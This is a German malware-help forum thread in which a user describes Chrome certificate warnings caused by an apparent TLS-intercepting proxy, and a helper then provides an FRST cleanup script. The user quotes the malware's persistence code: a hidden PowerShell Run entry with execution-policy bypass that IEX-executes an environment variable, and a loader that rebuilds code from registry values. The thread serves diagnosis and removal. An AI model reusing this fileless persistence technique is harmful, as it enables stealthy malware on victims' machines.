Hallo,

ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern.

Seit zwei Tagen ist es so, dass Chrom, und nur Crome (Firefox und Brave ist nicht betrofen) bei jeder (!) Webseite meldet, dass das Zertifikat ungültig ist. Schaue ich mir die Zertifikate an, dann ist der Aussteller immer Godady. Vergleiche ich die Zertifikate ist der Rest (bis auf Serial, Key, usw.) identisch. Es liegt also nahe dass für Chrome der Traffic durch einen Proxy geleitet wird der versucht in den SSL-Traffic einzubrechen.

Ich habe im Zertifikatsstore ein Root-Zertifikat für 127.0.0.1 gefunden. Das reiche ich noch nach, habe ich im Moment nicht vorrätig. Das habe ich vorsorglich entfernt. Nach einem Neustart war das Problem dann weg. Am nächsten Tag war das Problem aber wieder da. Dann habe ich mich weiter umgesehen und in der Registry unter "Run" für den Benutzer folgendes gefunden:

Code: Alles auswählenAufklappen

ATTFilter

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))"
         

Die dort referenzierte Environment-Variable enthält:

Code: Alles auswählenAufklappen

ATTFilter

for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc)
         

Die dort referenzieren Registry-Keys habe ich exportiert und hier angehängt.

Das ist offensichtlich obfuskierter Powershell-Code. Lässt sich herausfinden was der tut?

So viel für Heute dazu, später mehr.

TIA
Matthias

Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen.



Das sieht nach Malware aus, die über den Run-Value auf den Schlüssel in der Reg zeigt. Was die Malware macht, kann ich dir nicht sagen.
Es gibt aber Base64 Decoder/Encoder, evtl. bekommt man darüber was raus.

Du scheinst gut in der Materie bewandert zu sein, trotzdem bitte nichts selber löschen... zuerst FRST auszuführen.
Bitte poste die Logdateien von FRST, sobald du sie hast.

Bitte beachten - Unsere Regeln bei der Bereinigung - Welche Informationen wir benötigen:
Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten?

Hallo Namensvetter :-)

Base64 ... die Sache mit den Tomaten auf den Augen :-) gleich mal anschauen ... Das mit dem FRST wird noch ein bisschen dauern. Erst muss ich das Gerät in die Hand bekommen. Ich möchte es bis auf weiteres nicht mehr am Netz betreiben.

Eine Sache kann ich aber noch nachtragen: Der Windows-Defender hat mir die powershell.exe angemecker. Daraufhin habe ich mal Desinfect drauf losgelassen, allerdings ohne jedes Ergebnis.

Ok, danke für die Infos.

Bitte keine Tools mehr blind/alleine laufen lassen, sondern warten, bis von mir weitere Anweisungen kommen.


Warten wir die Logdateien von FRST ab, Spekulationen bringen nichts.

Servus,


wie sieht es aus?

Können wir dein System hier analysieren und bereinigen?
Oder hast du andere Pläne?

So, endlich habe ich die Logs ... habe mir erlaubt auch die Downloads der Privacy wegen zu bereinigen.

Hast du den HKU-run Wert der Malware (und ggf. weitere Einträge) bereits entfernt oder war das der Windows Defender?

Mal schauen, ob überhaupt noch was davon übrig ist....






Schritt 1

• Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
• Kopiere den gesamten Inhalt der folgenden Code-Box:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  Start::
  HKLM-x32\...\Run: [] => [X]
  HKLM\ DisallowedCertificates: B47B03E57CE218674BA202EC9CB2B82702A7C1FB (U)
  DeleteKey: HKCU\Software\aebadbbdaffbef
  DeleteKey: HKCU\Environment\aebadbbdaffbef
  DeleteValue: HKCU\Environment|aebadbbdaffbef
  DeleteValue: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aebadbbdaffbef
  CMD: ipconfig /flushdns
  CMD: netsh winsock reset
  CMD: netsh advfirewall reset
  CMD: netsh advfirewall set allprofiles state ON
  CMD: Bitsadmin /Reset /Allusers
  powershell: Set-MpPreference -PUAProtection Enabled
  Hosts:
  RemoveProxy:
  SystemRestore: On 
  EmptyTemp:
  End::
           

• Starte nun FRST und klicke direkt den Reparieren Button.
  Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
• Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
• Gegebenenfalls muss dein Rechner neu gestartet werden.
• Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Schritt 2

• Starte FRST erneut. Kopiere den Inhalt der folgenden Code-Box oben in das Suchfeld:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  SearchAll: aebadbbdaffbef
           

• Klicke auf den Button Datei-Suche.
• FRST beginnt mit dem Suchlauf. Das kann einige Zeit dauern, bitte gedulde dich!
• Am Ende wird eine Textdatei Search.txt erstellt.
• Poste mir deren Inhalt mit deiner nächsten Antwort.

Schritt 3

• Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
• FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
• Poste mir beide Logdateien mit deiner nächsten Antwort.

Bitte poste mit deiner nächsten Antwort:

• die Logdatei des FRST-Fix (fixlog.txt)
• die Logdatei des FRST-Suchlaufs (Search.txt)
• die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)